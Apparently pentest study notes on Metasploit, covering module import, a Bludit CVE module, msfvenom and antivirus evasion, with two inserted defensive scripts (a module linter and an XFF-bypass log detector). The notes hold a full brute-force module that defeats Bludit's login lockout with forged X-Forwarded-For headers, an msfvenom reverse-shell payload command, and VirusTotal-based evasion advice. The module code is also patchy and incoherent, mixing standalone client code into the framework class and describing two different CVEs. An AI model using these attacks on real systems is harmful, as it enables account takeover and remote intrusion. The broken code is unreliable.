# Importing a Module
- exploitDB may have custom exploits not found in MSF
- if the MSF filter is selected, only scripts that are available in Metasploit module format will be shown
- `searchsploit` is a command-line version of exploitDB
- to import a script: save script as an `.rb` file and copy to `/usr/share/metasploit-framework/modules`
- then run `msfconsole` and `reload_all`
- `search <name>` or `use exploit/path_xxx`
# Writing a Module
## Proof-of-Concept (POC) - Requirements
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient # provides methods for acting as an HTTP client when exploiting an HTTP server
  include Msf::Exploit::PhpEXE             # methods for generating a first-stage PHP payload
  include Msf::Exploit::FileDropper        # methods that transfer files and handle clean-up after the session is established
  include Msf::Auxiliary::Report           # methods for reporting data to the MSF DB
```
## POC - Module Info
```ruby
  def initialize(info={})
    super(update_info(info,
      'Name' => "Bludit Directory Traversal Image File Upload Vulnerability",
      'Description' => %q{
        This module exploits a vulnerability in Bludit. A remote user could abuse the uuid
        parameter in the image upload feature in order to save a malicious payload anywhere
        onto the server, and then use a custom .htaccess file to bypass the file extension
        check to finally get remote code execution.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'christasa', # Original discovery
          'sinn3r'     # Metasploit module
        ],
      'References' =>
        [
          ['CVE', '2019-16113'],
          ['URL', 'https://github.com/bludit/bludit/issues/1081'],
          ['URL', 'https://github.com/bludit/bludit/commit/a9640ff6b5f2c0fa770ad7758daf24fec6fbf3f5#diff-6f5ea518e6fc98fb4c16830bbf9f5dac']
        ],
      'Platform' => 'php',
      'Arch' => ARCH_PHP,
      'Notes' =>
        {
          'SideEffects' => [ IOC_IN_LOGS ],
          'Reliability' => [ REPEATABLE_SESSION ],
          'Stability' => [ CRASH_SAFE ]
        },
      'Targets' =>
        [
          [ 'Bludit v3.9.2', {} ]
        ],
      'Privileged' => false,
      'DisclosureDate' => "2019-09-07",
      'DefaultTarget' => 0))
```
## POC - Functions
```ruby
    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path for Bludit', '/']),
        OptString.new('BLUDITUSER', [true, 'The username for Bludit']),
        OptString.new('BLUDITPASS', [true, 'The password for Bludit'])
      ])
  end
```
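As an added example (not from these notes, and not the framework's own `tools/dev/msftidy.rb`, which remains the authoritative check), the following Ruby script lints the metadata covered in the import and module-info sections above before a file is copied into the modules directory and picked up by `reload_all`: it parses the file, then checks the class name, `Rank`, the required `update_info` keys, the `DisclosureDate` format and the reference types. The required-key list, the reference-type list and both sample modules are constructed for this example.

```ruby
# Added example: a minimal pre-import lint for a Metasploit module file.
# Not part of the notes and not Metasploit's msftidy.rb; the key and
# reference-type lists below are this example's own assumptions.
require 'date'

REQUIRED_KEYS   = %w[Name Description License Author References DisclosureDate].freeze
KNOWN_REF_TYPES = %w[CVE CWE BID MSB EDB URL WPVDB ZDI US-CERT-VU PACKETSTORM].freeze

# Read a quoted scalar, e.g. 'DisclosureDate' => "2019-09-07".
def metadata_value(src, key)
  m = src.match(/'#{key}'\s*=>\s*(?:"([^"]*)"|'([^']*)')/)
  m && (m[1] || m[2])
end

# Return the list of findings; an empty list means the file passes.
def lint_module(src)
  findings = []
  # reload_all reports a load error before any metadata matters, so parse first.
  begin
    RubyVM::AbstractSyntaxTree.parse(src)
  rescue SyntaxError => e
    findings << "does not parse: #{e.message.lines.first.strip}"
  end
  findings << 'class must be MetasploitModule' unless src.match?(/class MetasploitModule\s*</)
  findings << 'Rank is not set' unless src.match?(/^\s*Rank\s*=\s*\w+Ranking/)
  REQUIRED_KEYS.each do |key|
    findings << "missing metadata key #{key}" unless src.match?(/'#{key}'\s*=>/)
  end
  findings << 'License should be MSF_LICENSE' unless src.match?(/'License'\s*=>\s*MSF_LICENSE/)
  if (date = metadata_value(src, 'DisclosureDate'))
    begin
      Date.strptime(date, '%Y-%m-%d')
    rescue ArgumentError
      findings << "DisclosureDate #{date.inspect} is not YYYY-MM-DD"
    end
  end
  # References are [type, value] pairs; an unknown type is usually a typo.
  src.scan(/\[\s*'([\w-]+)'\s*,\s*'([^']*)'\s*\]/).each do |type, value|
    findings << "unknown reference type #{type}" unless KNOWN_REF_TYPES.include?(type)
    findings << "malformed CVE id #{value}" if type == 'CVE' && !value.match?(/\A\d{4}-\d{4,}\z/)
  end
  findings
end

# Constructed sample that should pass (name, author and URL are placeholders).
GOOD_MODULE = <<~'RUBY'
  class MetasploitModule < Msf::Exploit::Remote
    Rank = ExcellentRanking
    include Msf::Exploit::Remote::HttpClient

    def initialize(info = {})
      super(update_info(info,
        'Name' => 'Example CMS Image Upload (constructed sample)',
        'Description' => %q{ Constructed sample used only to exercise the lint. },
        'License' => MSF_LICENSE,
        'Author' => ['example-researcher'],
        'References' => [['CVE', '2019-16113'], ['URL', 'https://example.invalid/advisory']],
        'DisclosureDate' => '2019-09-07',
        'DefaultTarget' => 0))
    end
  end
RUBY

# Constructed sample with the mistakes the lint is meant to catch: a non-framework
# license, a US-style date, a misspelt reference type and a missing closing `end`.
BAD_MODULE = <<~'RUBY'
  class MetasploitModule < Msf::Exploit::Remote
    Rank = ExcellentRanking

    def initialize(info = {})
      super(update_info(info,
        'Name' => 'Broken sample',
        'Description' => 'Constructed sample with deliberate mistakes.',
        'License' => 'GPL',
        'Author' => ['example-researcher'],
        'References' => [['CEV', '2019-16113']],
        'DisclosureDate' => '09/07/2019',
        'DefaultTarget' => 0))
    end
RUBY

if __FILE__ == $PROGRAM_NAME
  { 'good' => GOOD_MODULE, 'bad' => BAD_MODULE }.each do |label, src|
    findings = lint_module(src)
    puts "#{label}: #{findings.empty? ? 'ok' : findings.join('; ')}"
  end
end
```

Run it on a downloaded `.rb` by reading the file into `lint_module` before copying it under `/usr/share/metasploit-framework/modules`; a syntax finding is the same failure `reload_all` would otherwise print, only earlier.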
## POC - Full Code
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE
  include Msf::Auxiliary::Report

  def initialize(info={})
    super(update_info(info,
      'Name' => "Bludit 3.9.2 - Authentication Bruteforce Mitigation Bypass",
      'Description' => %q{
        Versions prior to and including 3.9.2 of the Bludit CMS are vulnerable to a bypass of
        the anti-brute force mechanism that is in place to block users that have attempted to
        login incorrectly ten times or more. Within the bl-kernel/security.class.php file, a
        function named getUserIp attempts to determine the valid IP address of the end-user by
        trusting the X-Forwarded-For and Client-IP HTTP headers.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'rastating', # Original discovery
          '0ne-nine9'  # Metasploit module
        ],
      'References' =>
        [
          ['CVE', '2019-17240'],
          ['URL', 'https://rastating.github.io/bludit-brute-force-mitigation-bypass/'],
          ['PATCH', 'https://github.com/bludit/bludit/pull/1090']
        ],
      'Platform' => 'php',
      'Arch' => ARCH_PHP,
      'Notes' =>
        {
          'SideEffects' => [ IOC_IN_LOGS ],
          'Reliability' => [ REPEATABLE_SESSION ],
          'Stability' => [ CRASH_SAFE ]
        },
      'Targets' =>
        [
          [ 'Bludit v3.9.2', {} ]
        ],
      'Privileged' => false,
      'DisclosureDate' => "2019-10-05",
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path for Bludit', '/']),
        OptString.new('BLUDITUSER', [true, 'The username for Bludit']),
        OptPath.new('PASSWORDS', [ true, 'The list of passwords',
          File.join(Msf::Config.data_directory, "wordlists", "passwords.txt") ])
      ])
  end

  # -- Exploit code -- #

  # dirty workaround to remove this warning:
  # Cookie#domain returns dot-less domain name now. Use Cookie#dot_domain if you need "." at the beginning.
  # see https://github.com/nahi/httpclient/issues/252
  class WebAgent
    class Cookie < HTTP::Cookie
      def domain
        self.original_domain
      end
    end
  end

  # fetch the login page and pull the anti-CSRF token out of the form
  def get_csrf(client, login_url)
    res = client.get(login_url)
    /input.+?name="tokenCSRF".+?value="(.+?)"/.match(res.body).captures[0]
  end

  # a successful login answers with a redirect to the dashboard
  def auth_ok?(res)
    HTTP::Status.redirect?(res.code) &&
      %r{/admin/dashboard}.match?(res.headers['Location'])
  end

  def bruteforce_auth(client, host, username, wordlist)
    login_url = host + '/admin/login'
    File.foreach(wordlist).with_index do |password, i|
      password = password.chomp
      csrf_token = get_csrf(client, login_url)
      headers = {
        'X-Forwarded-For' => "#{i}-#{password[..4]}",
      }
      data = {
        'tokenCSRF' => csrf_token,
        'username' => username,
        'password' => password,
      }
      puts "[*] Trying password: #{password}"
      auth_res = client.post(login_url, data, headers)
      if auth_ok?(auth_res)
        puts "\n[+] Password found: #{password}"
        break
      end
    end
  end

  # left over from the standalone script this was lifted from (Docopt CLI entry point)
  #begin
  #  args = Docopt.docopt(doc)
  #  pp args if args['--debug']
  #
  #  clnt = HTTPClient.new
  #  bruteforce_auth(clnt, args['--root-url'], args['--user'], args['--wordlist'])
  #rescue Docopt::Exit => e
  #  puts e.message
  #end
end # closes MetasploitModule; without it reload_all fails with a syntax error
```
# MSFVENOM
- `MSFVenom` merges two older tools, `MSFPayload` and `MSFEncode`. Before it existed, the output of `MSFPayload`, which generated shellcode for a specific processor architecture and OS release, had to be piped (`|`) into `MSFEncode`, which offered multiple encoding schemes used both to remove bad characters from shellcode (bad characters could cause instability at runtime) and to evade older Anti-Virus (`AV`) and endpoint Intrusion Prevention / Intrusion Detection (`IPS/IDS`) software
```bash
# generating a payload with msfvenom
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=1337 -f aspx > reverse_shell.aspx
```
# FW AND IDS-IPS EVASION
- Endpoint protection refers to any localized device or service whose sole purpose is to protect a single host on the network
- Perimeter protection usually comes in physical or virtualized devices on the network perimeter edge
- Security policies are the driving force behind every well-maintained network security posture
- Security policies function similarly to ACLs

|**Security Policy**|**Description**|
|---|---|
|`Signature-based Detection`|Inspection of packets on the network and comparison against pre-built, pre-ordained attack patterns known as signatures. Any 100% match against these signatures generates an alarm.|
|`Heuristic / Statistical Anomaly Detection`|Behavioral comparison against an established baseline that includes modus-operandi signatures for known APTs (Advanced Persistent Threats). The baseline identifies the norm for the network and which protocols are commonly used. Any deviation beyond the maximum threshold generates an alarm.|
|`Stateful Protocol Analysis Detection`|Recognizing divergence from expected protocol state by comparing events against pre-built profiles of generally accepted definitions of non-malicious activity.|
|`Live-monitoring and Alerting (SOC-based)`|A team of analysts in a dedicated, in-house, or leased SOC (Security Operations Center) uses live-feed software to monitor network activity and intermediate alarming systems for potential threats, either deciding themselves whether a threat should be acted upon or letting the automated mechanisms take action instead.|
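As an added example that is not part of these notes, the following Ruby script applies the first two rows of the table to the log artefact left behind by the X-Forwarded-For bypass described in the Bludit module above (the reason its metadata carries `IOC_IN_LOGS`): a signature rule on the header value itself, and a statistical rule that keys its counters on the real TCP peer address, which a client cannot rotate the way it can rotate a header. The log format (Apache combined format with `%{X-Forwarded-For}i` appended), the addresses, the header values and the threshold are constructed for this example.

```ruby
# Added example (not from the notes): signature-based and statistical anomaly
# detection of X-Forwarded-For based login-lockout bypass, run over constructed
# web-server log lines. Addresses and values are constructed sample data.
require 'ipaddr'
require 'set'

LOGIN_PATH = '/admin/login'
LOCKOUT_THRESHOLD = 10 # Bludit blocks a source after ten failed logins (assumed as baseline)

# Build one constructed Apache-style line: combined format plus "%{X-Forwarded-For}i".
def log_line(ip, method, path, status, xff)
  %(#{ip} - - [05/Oct/2019:10:00:01 +0000] "#{method} #{path} HTTP/1.1" #{status} 512 "#{xff}")
end

# Constructed sample: 203.0.113.10 sends a non-IP X-Forwarded-For value that changes on
# every failed login (the pattern of the script above); 198.51.100.7 is a normal user
# behind a real proxy who mistypes once and then succeeds (302 to the dashboard).
SAMPLE_LOG = [
  *(0...12).map { |i| log_line('203.0.113.10', 'POST', LOGIN_PATH, 200, "#{i}-passw") },
  log_line('198.51.100.7', 'POST', LOGIN_PATH, 200, '192.0.2.44'),
  log_line('198.51.100.7', 'POST', LOGIN_PATH, 302, '192.0.2.44'),
  log_line('198.51.100.7', 'GET', '/admin/dashboard', 200, '192.0.2.44')
].freeze

LINE_RE = /\A(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \d+ "([^"]*)"\z/

def parse_line(line)
  return nil unless (m = LINE_RE.match(line))
  { ip: m[1], method: m[2], path: m[3], status: m[4].to_i, xff: m[5] }
end

def valid_ip?(value)
  IPAddr.new(value)
  true
rescue ArgumentError # IPAddr::InvalidAddressError is a subclass
  false
end

# Signature-based rule: the header value is the known-bad pattern. A proxy puts an
# IP address in X-Forwarded-For; anything else was forged by the client.
def signature_alerts(events)
  events.select { |e| e[:xff] != '-' && !valid_ip?(e[:xff]) }
        .map { |e| "forged X-Forwarded-For #{e[:xff].inspect} from #{e[:ip]}" }
end

# Statistical anomaly rule: count per real peer address, and alarm when a source
# crosses the baseline either in failed logins or in distinct header values presented.
def anomaly_alerts(events, threshold = LOCKOUT_THRESHOLD)
  stats = Hash.new { |h, k| h[k] = { failed: 0, xff: Set.new } }
  events.each do |e|
    next unless e[:method] == 'POST' && e[:path] == LOGIN_PATH
    stats[e[:ip]][:failed] += 1 unless e[:status] == 302 # success redirects to /admin/dashboard
    stats[e[:ip]][:xff] << e[:xff]
  end
  stats.filter_map do |ip, s|
    next if s[:failed] < threshold && s[:xff].size < threshold
    "#{ip}: #{s[:failed]} failed logins across #{s[:xff].size} X-Forwarded-For values"
  end
end

def detect(lines)
  events = lines.filter_map { |l| parse_line(l) }
  { signature: signature_alerts(events), anomaly: anomaly_alerts(events) }
end

if __FILE__ == $PROGRAM_NAME
  detect(SAMPLE_LOG).each { |rule, alerts| alerts.each { |a| puts "[#{rule}] #{a}" } }
end
```

The two rules fail differently: the signature rule is silent once the header carries syntactically valid addresses, while the per-peer counter still fires because the lockout keyed on the header is exactly what the bypass defeats, which is the argument for applying the rate limit on the socket address as well as on any header-derived one.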
## Evasion Techniques
- Most host-based AV relies mainly on signature-based detection to identify aspects of malicious code present in a software sample
- encoders and encrypted tunnels (like meterpreter) can defeat signature-based detection
- test payloads against VirusTotal to see which engines still detect them
```bash
msf-virustotal -k <API key> -f test2
```